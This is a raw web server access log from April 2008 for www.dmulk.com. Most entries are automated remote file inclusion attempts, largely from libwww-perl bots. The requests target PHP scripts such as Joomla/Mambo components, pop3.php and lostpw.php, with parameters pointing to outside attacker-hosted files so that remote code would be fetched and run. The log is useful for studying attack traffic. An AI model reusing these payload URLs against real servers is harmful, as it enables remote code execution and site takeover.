200.230.71.1 - - [08/Apr/2008:14:15:45 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:14:15:58 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:14:16:06 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [08/Apr/2008:14:16:09 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:14:16:11 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [08/Apr/2008:14:16:13 -0700] "GET /logs/access_080308.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [08/Apr/2008:14:16:13 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [08/Apr/2008:14:16:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.95 - - [08/Apr/2008:14:16:35 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.22.204.188 - - [08/Apr/2008:14:17:49 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [08/Apr/2008:14:18:23 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [08/Apr/2008:14:18:23 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [08/Apr/2008:14:18:23 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:14:18:28 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:14:18:28 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:14:18:28 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:18:29 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:18:30 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:18:30 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.98.60.90 - - [08/Apr/2008:14:18:37 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [08/Apr/2008:14:18:37 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [08/Apr/2008:14:18:37 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:18:45 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:18:46 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:18:47 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:14:18:51 -0700] "GET /database.php?mosConfig_absolute_path=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:14:18:51 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.6.20.237 - - [08/Apr/2008:14:19:00 -0700] "GET /logs/?N=A HTTP/1.0" 200 42249 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:14:19:11 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:14:19:11 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:14:19:11 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
164.115.6.18 - - [08/Apr/2008:14:19:23 -0700] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://150.35.244.118/dfm/porra/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:19:23 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
164.115.6.18 - - [08/Apr/2008:14:19:23 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://150.35.244.118/dfm/porra/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:19:31 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.30.216.102 - - [08/Apr/2008:14:19:41 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.98.60.90 - - [08/Apr/2008:14:20:13 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:14:20:13 -0700] "GET /content.php?inc=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:14:20:21 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [08/Apr/2008:14:20:22 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:14:20:24 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.173.79.40 - - [08/Apr/2008:14:20:41 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://irc0de.runhost.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:14:20:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:14:22:05 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:14:22:09 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:14:22:11 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:14:22:11 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:14:22:43 -0700] "GET /logs/appserv/main.php?appserv_root=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:14:22:43 -0700] "GET /appserv/main.php?appserv_root=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:14:22:55 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:23:05 -0700] "GET /logs/access_080126.log/modules/My_eGallery/index.php?basepath=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:23:05 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:23:06 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.98.60.90 - - [08/Apr/2008:14:23:19 -0700] "GET /logs/access_080329.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.102.67 - - [08/Apr/2008:14:23:25 -0700] "GET /define.php?term=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
64.202.102.67 - - [08/Apr/2008:14:23:28 -0700] "GET /logs/define.php?term=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:23:36 -0700] "GET /logs/access_080329.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:23:52 -0700] "GET /logs/access_080104.log//Neos_Chronos/header.php?base_folder=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.60.90 - - [08/Apr/2008:14:23:53 -0700] "GET /logs/access_080329.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:23:58 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:23:59 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.6.49 - - [08/Apr/2008:14:24:11 -0700] "GET /logs/access_080329.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:14:24:19 -0700] "GET /logs/access_080329.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:14:24:29 -0700] "GET /logs/access_080329.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.72.52 - - [08/Apr/2008:14:25:15 -0700] "GET /index.php?pag=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:14:26:24 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:14:26:25 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:14:26:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:14:26:26 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:14:26:31 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:14:26:33 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:14:26:33 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:14:27:27 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.22.139.237 - - [08/Apr/2008:14:27:39 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
84.22.139.237 - - [08/Apr/2008:14:27:42 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:14:27:47 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:14:27:57 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:14:27:58 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:14:27:59 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.22.139.237 - - [08/Apr/2008:14:28:26 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.22.139.237 - - [08/Apr/2008:14:28:27 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.22.139.237 - - [08/Apr/2008:14:28:29 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
84.22.139.237 - - [08/Apr/2008:14:28:29 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
84.22.139.237 - - [08/Apr/2008:14:28:30 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.22.139.237 - - [08/Apr/2008:14:28:30 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:29:45 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:29:46 -0700] "GET /_theme/breadcrumb.php?rootBase=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:29:47 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:29:48 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:14:30:23 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:14:30:25 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:14:30:26 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:14:30:29 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:31:29 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:14:31:47 -0700] "GET /logs/access_080329.log/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:14:31:47 -0700] "GET /logs/access_080329.log/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:14:31:47 -0700] "GET /lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:14:31:47 -0700] "GET /lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:14:31:48 -0700] "GET /logs/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:14:31:48 -0700] "GET /logs/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.30.100 - - [08/Apr/2008:14:31:48 -0700] "GET /logs/access_080329.log/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.30.100 - - [08/Apr/2008:14:31:48 -0700] "GET /lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
